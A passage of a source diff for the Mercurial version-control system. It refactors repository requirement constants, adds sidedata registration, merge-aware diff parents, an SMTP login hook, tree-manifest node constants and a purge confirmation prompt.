supportedformats = { - b'revlogv1', - b'generaldelta', + requirementsmod.REVLOGV1_REQUIREMENT, + requirementsmod.GENERALDELTA_REQUIREMENT, requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, requirementsmod.REVLOGV2_REQUIREMENT, @@ -1208,11 +1226,11 @@ requirementsmod.SHARESAFE_REQUIREMENT, } _basesupported = supportedformats | { - b'store', - b'fncache', + requirementsmod.STORE_REQUIREMENT, + requirementsmod.FNCACHE_REQUIREMENT, requirementsmod.SHARED_REQUIREMENT, requirementsmod.RELATIVE_SHARED_REQUIREMENT, - b'dotencode', + requirementsmod.DOTENCODE_REQUIREMENT, requirementsmod.SPARSE_REQUIREMENT, requirementsmod.INTERNAL_PHASE_REQUIREMENT, } @@ -1315,6 +1333,8 @@ self.vfs = hgvfs self.path = hgvfs.base self.requirements = requirements + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid self.supported = supportedrequirements self.sharedpath = sharedpath self.store = store @@ -1386,6 +1406,10 @@ if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements: self.filecopiesmode = b'changeset-sidedata' + self._wanted_sidedata = set() + self._sidedata_computers = {} + metadatamod.set_sidedata_spec_for_repo(self) + def _getvfsward(self, origfunc): """build a ward for self.vfs""" rref = weakref.ref(self) @@ -1473,6 +1497,8 @@ bundle2.getrepocaps(self, role=b'client') ) caps.add(b'bundle2=' + urlreq.quote(capsblob)) + if self.ui.configbool(b'experimental', b'narrow'): + caps.add(wireprototypes.NARROWCAP) return caps # Don't cache auditor/nofsauditor, or you'll end up with reference cycle: @@ -1639,7 +1665,10 @@ def changelog(self): # load dirstate before changelog to avoid race see issue6303 self.dirstate.prefetch_parents() - return self.store.changelog(txnutil.mayhavepending(self.root)) + return self.store.changelog( + txnutil.mayhavepending(self.root), + concurrencychecker=revlogchecker.get_checker(self.ui, b'changelog'), + ) @storecache(b'00manifest.i') def manifestlog(self): @@ -1654,7 +1683,12 @@ 
sparsematchfn = lambda: sparse.matcher(self) return dirstate.dirstate( - self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn + self.vfs, + self.ui, + self.root, + self._dirstatevalidate, + sparsematchfn, + self.nodeconstants, ) def _dirstatevalidate(self, node): @@ -2059,6 +2093,9 @@ self._revbranchcache = branchmap.revbranchcache(self.unfiltered()) return self._revbranchcache + def register_changeset(self, rev, changelogrevision): + self.revbranchcache().setdata(rev, changelogrevision) + def branchtip(self, branch, ignoremissing=False): """return the tip node for a given branch @@ -3326,6 +3363,22 @@ fp.close() return self.pathto(fp.name[len(self.root) + 1 :]) + def register_wanted_sidedata(self, category): + self._wanted_sidedata.add(pycompat.bytestr(category)) + + def register_sidedata_computer(self, kind, category, keys, computer): + if kind not in (b"changelog", b"manifest", b"filelog"): + msg = _(b"unexpected revlog kind '%s'.") + raise error.ProgrammingError(msg % kind) + category = pycompat.bytestr(category) + if category in self._sidedata_computers.get(kind, []): + msg = _( + b"cannot register a sidedata computer twice for category '%s'." 
+ ) + raise error.ProgrammingError(msg % category) + self._sidedata_computers.setdefault(kind, {}) + self._sidedata_computers[kind][category] = (keys, computer) + # used to avoid circular references so destructors work def aftertrans(files): @@ -3352,7 +3405,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) @@ -3410,18 +3463,20 @@ % createopts[b'backend'] ) - requirements = {b'revlogv1'} + requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): - requirements.add(b'store') + requirements.add(requirementsmod.STORE_REQUIREMENT) if ui.configbool(b'format', b'usefncache'): - requirements.add(b'fncache') + requirements.add(requirementsmod.FNCACHE_REQUIREMENT) if ui.configbool(b'format', b'dotencode'): - requirements.add(b'dotencode') + requirements.add(requirementsmod.DOTENCODE_REQUIREMENT) compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: if compengine in util.compengines: - break + engine = util.compengines[compengine] + if engine.available() and engine.revlogheader(): + break else: raise error.Abort( _( @@ -3442,15 +3497,19 @@ requirements.add(b'exp-compression-%s' % compengine) if scmutil.gdinitconfig(ui): - requirements.add(b'generaldelta') + requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT) if ui.configbool(b'format', b'sparse-revlog'): requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT) # experimental config: format.exp-use-side-data if ui.configbool(b'format', b'exp-use-side-data'): + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) # experimental config: format.exp-use-copies-side-data-changeset if ui.configbool(b'format', b'exp-use-copies-side-data-changeset'): + 
requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) + requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) requirements.add(requirementsmod.SIDEDATA_REQUIREMENT) requirements.add(requirementsmod.COPIESSDC_REQUIREMENT) if ui.configbool(b'experimental', b'treemanifest'): @@ -3458,9 +3517,9 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(b'revlogv1') + requirements.discard(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. - requirements.discard(b'generaldelta') + requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) # experimental config: format.internal-phase if ui.configbool(b'format', b'internal-phase'): @@ -3494,7 +3553,7 @@ dropped = set() - if b'store' not in requirements: + if requirementsmod.STORE_REQUIREMENT not in requirements: if bookmarks.BOOKMARKS_IN_STORE_REQUIREMENT in requirements: ui.warn( _( @@ -3617,6 +3676,7 @@ if createopts.get(b'sharedrelative'): try: sharedpath = os.path.relpath(sharedpath, hgvfs.base) + sharedpath = util.pconvert(sharedpath) except (IOError, ValueError) as e: # ValueError is raised on Windows if the drive letters differ # on each path. @@ -3633,7 +3693,8 @@ hgvfs.mkdir(b'cache') hgvfs.mkdir(b'wcache') - if b'store' in requirements and b'sharedrepo' not in createopts: + has_store = requirementsmod.STORE_REQUIREMENT in requirements + if has_store and b'sharedrepo' not in createopts: hgvfs.mkdir(b'store') # We create an invalid changelog outside the store so very old @@ -3642,11 +3703,11 @@ # effectively locks out old clients and prevents them from # mucking with a repo in an unknown format. # - # The revlog header has version 2, which won't be recognized by + # The revlog header has version 65535, which won't be recognized by # such old clients. 
hgvfs.append( b'00changelog.i', - b'\0\0\0\2 dummy changelog to prevent using the old repo ' + b'\0\0\xFF\xFF dummy changelog to prevent using the old repo ' b'layout', ) diff --git a/mercurial/lock.py b/mercurial/lock.py --- a/mercurial/lock.py +++ b/mercurial/lock.py @@ -1,6 +1,6 @@ # lock.py - simple advisory locking scheme for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -1,6 +1,6 @@ # logcmdutil.py - utility for log-like commands # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -14,6 +14,7 @@ from .i18n import _ from .node import ( nullid, + nullrev, wdirid, wdirrev, ) @@ -27,6 +28,7 @@ graphmod, match as matchmod, mdiff, + merge, patch, pathutil, pycompat, @@ -74,6 +76,36 @@ return limit +def diff_parent(ctx): + """get the context object to use as parent when diffing + + + If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. + """ + repo = ctx.repo() + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev: + # avoid cycle context -> subrepo -> cmdutil -> logcmdutil + from . 
import context + + wctx = context.overlayworkingctx(repo) + wctx.setbase(ctx.p1()) + with repo.ui.configoverride( + { + ( + b"ui", + b"forcemerge", + ): b"internal:merge3-lie-about-conflicts", + }, + b"merge-diff", + ): + repo.ui.pushbuffer() + merge.merge(ctx.p2(), wc=wctx) + repo.ui.popbuffer() + return wctx + else: + return ctx.p1() + + def diffordiffstat( ui, repo, @@ -217,7 +249,7 @@ ui, ctx.repo(), diffopts, - ctx.p1(), + diff_parent(ctx), ctx, match=self._makefilematcher(ctx), stat=stat, diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. diff --git a/mercurial/loggingutil.py b/mercurial/loggingutil.py --- a/mercurial/loggingutil.py +++ b/mercurial/loggingutil.py @@ -10,7 +10,10 @@ import errno -from . import pycompat +from . 
import ( + encoding, + pycompat, +) from .utils import ( dateutil, @@ -32,7 +35,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot remove '%s': %s\n" - % (newpath, err.strerror) + % (newpath, encoding.strtolocal(err.strerror)) ) try: if newpath: @@ -41,7 +44,7 @@ if err.errno != errno.ENOENT: ui.debug( b"warning: cannot rename '%s' to '%s': %s\n" - % (newpath, oldpath, err.strerror) + % (newpath, oldpath, encoding.strtolocal(err.strerror)) ) if maxsize > 0: diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -1,6 +1,6 @@ # mail.py - mail sending bits for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: @@ -150,6 +151,32 @@ if starttls or smtps: ui.note(_(b'(verifying remote certificate)\n')) sslutil.validatesocket(s.sock) + + try: + _smtp_login(ui, s, mailhost, mailport) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + def send(sender, recipients, msg): + try: + return s.sendmail(sender, recipients, msg) + except smtplib.SMTPRecipientsRefused as inst: + recipients = [r[1] for r in inst.recipients.values()] + raise error.Abort(b'\n' + b'\n'.join(recipients)) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + return send + + +def _smtp_login(ui, smtp, mailhost, mailport): + """A hook for the 
keyring extension to perform the actual SMTP login. + + An already connected SMTP object of the proper type is provided, based on + the current configuration. The host and port to which the connection was + established are provided for accessibility, since the SMTP object doesn't + provide an accessor. ``smtplib.SMTPException`` is raised on error. + """ username = ui.config(b'smtp', b'username') password = ui.config(b'smtp', b'password') if username: @@ -162,21 +189,7 @@ if username and password: ui.note(_(b'(authenticating to mail server as %s)\n') % username) username = encoding.strfromlocal(username) - try: - s.login(username, password) - except smtplib.SMTPException as inst: - raise error.Abort(stringutil.forcebytestr(inst)) - - def send(sender, recipients, msg): - try: - return s.sendmail(sender, recipients, msg) - except smtplib.SMTPRecipientsRefused as inst: - recipients = [r[1] for r in inst.recipients.values()] - raise error.Abort(b'\n' + b'\n'.join(recipients)) - except smtplib.SMTPException as inst: - raise error.Abort(inst) - - return send + smtp.login(username, password) def _sendmail(ui, sender, recipients, msg): @@ -207,17 +220,16 @@ def _mbox(mbox, sender, recipients, msg): '''write mails to mbox''' - fp = open(mbox, b'ab+') - # Should be time.asctime(), but Windows prints 2-characters day - # of month instead of one. Make them print the same thing. - date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) - fp.write( - b'From %s %s\n' - % (encoding.strtolocal(sender), encoding.strtolocal(date)) - ) - fp.write(msg) - fp.write(b'\n\n') - fp.close() + with open(mbox, b'ab+') as fp: + # Should be time.asctime(), but Windows prints 2-characters day + # of month instead of one. Make them print the same thing. 
+ date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) + fp.write( + b'From %s %s\n' + % (encoding.strtolocal(sender), encoding.strtolocal(date)) + ) + fp.write(msg) + fp.write(b'\n\n') def connect(ui, mbox=None): diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1,6 +1,6 @@ # manifest.py - manifest revision class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -792,8 +792,9 @@ @interfaceutil.implementer(repository.imanifestdict) class treemanifest(object): - def __init__(self, dir=b'', text=b''): + def __init__(self, nodeconstants, dir=b'', text=b''): self._dir = dir + self.nodeconstants = nodeconstants self._node = nullid self._loadfunc = _noop self._copyfunc = _noop @@ -1051,7 +1052,9 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].__setitem__(subpath, n) else: # manifest nodes are either 20 bytes or 32 bytes, @@ -1078,14 +1081,16 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].setflag(subpath, flags) else: self._flags[f] = flags self._dirty = True def copy(self): - copy = treemanifest(self._dir) + copy = treemanifest(self.nodeconstants, self._dir) copy._node = self._node copy._dirty = self._dirty if self._copyfunc is _noop: @@ -1215,7 +1220,7 @@ visit = match.visitchildrenset(self._dir[:-1]) if visit == b'all': return self.copy() - ret = treemanifest(self._dir) + ret = treemanifest(self.nodeconstants, self._dir) if not visit: return ret @@ -1272,7 +1277,7 @@ 
m2 = m2._matches(match) return m1.diff(m2, clean=clean) result = {} - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def _iterativediff(t1, t2, stack): """compares two tree manifests and append new tree-manifests which @@ -1368,7 +1373,7 @@ self._load() # for consistency; should never have any effect here m1._load() m2._load() - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def getnode(m, d): ld = m._lazydirs.get(d) @@ -1551,6 +1556,7 @@ def __init__( self, + nodeconstants, opener, tree=b'', dirlogcache=None, @@ -1567,6 +1573,7 @@ option takes precedence, so if it is set to True, we ignore whatever value is passed in to the constructor. """ + self.nodeconstants = nodeconstants # During normal operations, we expect to deal with not more than four # revs at a time (such as during commit --amend). When rebasing large # stacks of commits, the number can go up, hence the config knob below. @@ -1610,6 +1617,7 @@ self.index = self._revlog.index self.version = self._revlog.version self._generaldelta = self._revlog._generaldelta + self._revlog.revlog_kind = b'manifest' def _setupmanifestcachehooks(self, repo): """Persist the manifestfulltextcache on lock release""" @@ -1653,7 +1661,11 @@ assert self._treeondisk if d not in self._dirlogcache: mfrevlog = manifestrevlog( - self.opener, d, self._dirlogcache, treemanifest=self._treeondisk + self.nodeconstants, + self.opener, + d, + self._dirlogcache, + treemanifest=self._treeondisk, ) self._dirlogcache[d] = mfrevlog return self._dirlogcache[d] @@ -1704,9 +1716,10 @@ arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work) cachedelta = self._revlog.rev(p1), deltatext text = util.buffer(arraytext) - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, p1, p2, cachedelta ) + n = self._revlog.node(rev) except FastdeltaUnavailable: # The first parent manifest isn't already loaded or the # manifest implementation doesn't support 
fastdelta, so @@ -1724,7 +1737,8 @@ arraytext = None else: text = m.text() - n = self._revlog.addrevision(text, transaction, link, p1, p2) + rev = self._revlog.addrevision(text, transaction, link, p1, p2) + n = self._revlog.node(rev) arraytext = bytearray(text) if arraytext is not None: @@ -1765,9 +1779,10 @@ n = m2.node() if not n: - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, m1.node(), m2.node() ) + n = self._revlog.node(rev) # Save nodeid so parent manifest can calculate its nodeid m.setnode(n) @@ -1822,6 +1837,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -1829,6 +1845,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addgroup( @@ -1836,6 +1853,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -1843,6 +1861,7 @@ deltas, linkmapper, transaction, + alwayscache=alwayscache, addrevisioncb=addrevisioncb, duplicaterevisioncb=duplicaterevisioncb, ) @@ -1909,6 +1928,7 @@ they receive (i.e. 
tree or flat or lazily loaded, etc).""" def __init__(self, opener, repo, rootstore, narrowmatch): + self.nodeconstants = repo.nodeconstants usetreemanifest = False cachesize = 4 @@ -1947,7 +1967,7 @@ if not self._narrowmatch.always(): if not self._narrowmatch.visitdir(tree[:-1]): - return excludeddirmanifestctx(tree, node) + return excludeddirmanifestctx(self.nodeconstants, tree, node) if tree: if self._rootstore._treeondisk: if verify: @@ -2110,7 +2130,7 @@ def __init__(self, manifestlog, dir=b''): self._manifestlog = manifestlog self._dir = dir - self._treemanifest = treemanifest() + self._treemanifest = treemanifest(manifestlog.nodeconstants) def _storage(self): return self._manifestlog.getstorage(b'') @@ -2160,17 +2180,19 @@ narrowmatch = self._manifestlog._narrowmatch if not narrowmatch.always(): if not narrowmatch.visitdir(self._dir[:-1]): - return excludedmanifestrevlog(self._dir) + return excludedmanifestrevlog( + self._manifestlog.nodeconstants, self._dir + ) return self._manifestlog.getstorage(self._dir) def read(self): if self._data is None: store = self._storage() if self._node == nullid: - self._data = treemanifest() + self._data = treemanifest(self._manifestlog.nodeconstants) # TODO accessing non-public API elif store._treeondisk: - m = treemanifest(dir=self._dir) + m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) def gettext(): return store.revision(self._node) @@ -2190,7 +2212,9 @@ text = store.revision(self._node) arraytext = bytearray(text) store.fulltextcache[self._node] = arraytext - self._data = treemanifest(dir=self._dir, text=text) + self._data = treemanifest( + self._manifestlog.nodeconstants, dir=self._dir, text=text + ) return self._data @@ -2227,7 +2251,7 @@ r0 = store.deltaparent(store.rev(self._node)) m0 = self._manifestlog.get(self._dir, store.node(r0)).read() m1 = self.read() - md = treemanifest(dir=self._dir) + md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) for f, ((n0, fl0), (n1, fl1)) in 
pycompat.iteritems(m0.diff(m1)): if n1: md[f] = n1 @@ -2270,8 +2294,8 @@ whose contents are unknown. """ - def __init__(self, dir, node): - super(excludeddir, self).__init__(dir) + def __init__(self, nodeconstants, dir, node): + super(excludeddir, self).__init__(nodeconstants, dir) self._node = node # Add an empty file, which will be included by iterators and such, # appearing as the directory itself (i.e. something like "dir/") @@ -2290,12 +2314,13 @@ class excludeddirmanifestctx(treemanifestctx): """context wrapper for excludeddir - see that docstring for rationale""" - def __init__(self, dir, node): + def __init__(self, nodeconstants, dir, node): + self.nodeconstants = nodeconstants self._dir = dir self._node = node def read(self): - return excludeddir(self._dir, self._node) + return excludeddir(self.nodeconstants, self._dir, self._node) def readfast(self, shallow=False): # special version of readfast since we don't have underlying storage @@ -2317,7 +2342,8 @@ outside the narrowspec. """ - def __init__(self, dir): + def __init__(self, nodeconstants, dir): + self.nodeconstants = nodeconstants self._dir = dir def __len__(self): diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -1,12 +1,13 @@ # match.py - filename matching # -# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
from __future__ import absolute_import, print_function +import bisect import copy import itertools import os @@ -798,14 +799,38 @@ def visitdir(self, dir): return dir in self._dirs + @propertycache + def _visitchildrenset_candidates(self): + """A memoized set of candidates for visitchildrenset.""" + return self._fileset | self._dirs - {b''} + + @propertycache + def _sorted_visitchildrenset_candidates(self): + """A memoized sorted list of candidates for visitchildrenset.""" + return sorted(self._visitchildrenset_candidates) + def visitchildrenset(self, dir): if not self._fileset or dir not in self._dirs: return set() - candidates = self._fileset | self._dirs - {b''} - if dir != b'': + if dir == b'': + candidates = self._visitchildrenset_candidates + else: + candidates = self._sorted_visitchildrenset_candidates d = dir + b'/' - candidates = {c[len(d) :] for c in candidates if c.startswith(d)} + # Use bisect to find the first element potentially starting with d + # (i.e. >= d). This should always find at least one element (we'll + # assert later if this is not the case). + first = bisect.bisect_left(candidates, d) + # We need a representation of the first element that is > d that + # does not start with d, so since we added a `/` on the end of dir, + # we'll add whatever comes after slash (we could probably assume + # that `0` is after `/`, but let's not) to the end of dir instead. + dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1)) + # Use bisect to find the first element >= d_next + last = bisect.bisect_left(candidates, dnext, lo=first) + dlen = len(d) + candidates = {c[dlen:] for c in candidates[first:last]} # self._dirs includes all of the directories, recursively, so if # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo', # 'foo/bar' in it. 
Thus we can safely ignore a candidate that has a diff --git a/mercurial/mdiff.py b/mercurial/mdiff.py --- a/mercurial/mdiff.py +++ b/mercurial/mdiff.py @@ -1,6 +1,6 @@ # mdiff.py - diff and patch routines for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1,6 +1,6 @@ # merge.py - directory-level update/merge handling for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -234,7 +234,7 @@ else: warn(_(b"%s: untracked file differs\n") % f) if abortconflicts: - raise error.Abort( + raise error.StateError( _( b"untracked files in working directory " b"differ from files in requested revision" @@ -342,7 +342,7 @@ for f in pmmf: fold = util.normcase(f) if fold in foldmap: - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and %s") % (f, foldmap[fold]) ) @@ -353,7 +353,7 @@ for fold, f in sorted(foldmap.items()): if fold.startswith(foldprefix) and not f.startswith(unfoldprefix): # the folded prefix matches but actual casing is different - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and directory of %s") % (lastfull, f) ) @@ -505,7 +505,9 @@ if invalidconflicts: for p in invalidconflicts: repo.ui.warn(_(b"%s: is both a file and a directory\n") % p) - raise error.Abort(_(b"destination manifest contains path conflicts")) + raise error.StateError( + _(b"destination manifest contains path conflicts") + ) def _filternarrowactions(narrowmatch, branchmerge, mresult): @@ -1696,6 
+1698,7 @@ tocomplete = [] for f, args, msg in mergeactions: repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f) if f == b'.hgsubstate': # subrepo states need updating subrepoutil.submerge( @@ -1711,6 +1714,7 @@ # merge for f, args, msg in tocomplete: repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f, total=numupdates) ms.resolve(f, wctx) @@ -1919,10 +1923,10 @@ ### check phase if not overwrite: if len(pl) > 1: - raise error.Abort(_(b"outstanding uncommitted merge")) + raise error.StateError(_(b"outstanding uncommitted merge")) ms = wc.mergestate() - if list(ms.unresolved()): - raise error.Abort( + if ms.unresolvedcount(): + raise error.StateError( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), ) @@ -2008,7 +2012,7 @@ if mresult.hasconflicts(): msg = _(b"conflicting changes") hint = _(b"commit or update --clean to discard changes") - raise error.Abort(msg, hint=hint) + raise error.StateError(msg, hint=hint) # Prompt and create actions. Most of this is in the resolve phase # already, but we can't handle .hgsubstate in filemerge or @@ -2325,6 +2329,7 @@ removefiles=True, abortonerror=False, noop=False, + confirm=False, ): """Purge the working directory of untracked files. @@ -2345,6 +2350,8 @@ ``noop`` controls whether to actually remove files. If not defined, actions will be taken. + ``confirm`` ask confirmation before actually removing anything. + Returns an iterable of relative paths in the working directory that were or would be removed. 
""" @@ -2372,6 +2379,35 @@ status = repo.status(match=matcher, ignored=ignored, unknown=unknown) + if confirm: + nb_ignored = len(status.ignored) + nb_unkown = len(status.unknown) + if nb_unkown and nb_ignored: + msg = _(b"permanently delete %d unkown and %d ignored files?") + msg %= (nb_unkown, nb_ignored) + elif nb_unkown: + msg = _(b"permanently delete %d unkown files?") + msg %= nb_unkown + elif nb_ignored: + msg = _(b"permanently delete %d ignored files?") + msg %= nb_ignored + elif removeemptydirs: + dir_count = 0 + for f in directories: + if matcher(f) and not repo.wvfs.listdir(f): + dir_count += 1 + if dir_count: + msg = _( + b"permanently delete at least %d empty directories?" + ) + msg %= dir_count + else: + # XXX we might be missing directory there + return res + msg += b" (yN)$$ &Yes $$ &No" + if repo.ui.promptchoice(msg, default=1) == 1: + raise error.CanceledError(_(b'removal cancelled')) + if removefiles: for f in sorted(status.unknown + status.ignored): if not noop: diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -10,7 +10,7 @@ bin, hex, nullhex, - nullid, + nullrev, ) from . 
import ( error, @@ -341,7 +341,7 @@ flo = fco.flags() fla = fca.flags() if b'x' in flags + flo + fla and b'l' not in flags + flo + fla: - if fca.node() == nullid and flags != flo: + if fca.rev() == nullrev and flags != flo: if preresolve: self._repo.ui.warn( _( @@ -382,7 +382,6 @@ if merge_ret is None: # If return value of merge is None, then there are no real conflict del self._state[dfile] - self._stateextras.pop(dfile, None) self._dirty = True elif not merge_ret: self.mark(dfile, MERGE_RECORD_RESOLVED) diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -1,6 +1,6 @@ # mergeutil.py - help for merge processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -13,7 +13,7 @@ def checkunresolved(ms): - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.StateError( _(b"unresolved merge conflicts (see 'hg help resolve')") ) diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -18,6 +18,7 @@ from . import ( error, pycompat, + requirements as requirementsmod, util, ) @@ -321,12 +322,12 @@ │ (Some, None) │ OR │🄻 Deleted │ ø │ ø │ │ │🄷 Deleted[1] │ │ │ │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │🄸 No Changes │ │ │ │ - │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │ + │ │🄸 No Changes │ │ │ 🄽 Touched │ + │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ │ │ - │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ 🄿 Merged │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │ │ │ [3] │ │ (copied?) │ (copied?) 
│ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -414,6 +415,7 @@ nice bonus. However do not any of this yet. """ + repo = ctx.repo() md = ChangingFiles() m = ctx.manifest() @@ -453,8 +455,23 @@ # case 🄻 — both deleted the file. md.mark_removed(filename) elif d1[1][0] is not None and d2[1][0] is not None: - # case 🄽 🄾 🄿 - md.mark_merged(filename) + if d1[0][0] is None or d2[0][0] is None: + if any(_find(ma, filename) is not None for ma in mas): + # case 🅀 or 🅁 + md.mark_salvaged(filename) + else: + # case 🄽 🄾 : touched + md.mark_touched(filename) + else: + fctx = repo.filectx(filename, fileid=d1[1][0]) + if fctx.p2().rev() == nullrev: + # case 🅂 + # lets assume we can trust the file history. If the + # filenode is not a merge, the file was not merged. + md.mark_touched(filename) + else: + # case 🄿 + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on @@ -804,6 +821,21 @@ return encode_files_sidedata(files), files.has_copies_info +def copies_sidedata_computer(repo, revlog, rev, existing_sidedata): + return _getsidedata(repo, rev)[0] + + +def set_sidedata_spec_for_repo(repo): + if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements: + repo.register_wanted_sidedata(sidedatamod.SD_FILES) + repo.register_sidedata_computer( + b"changelog", + 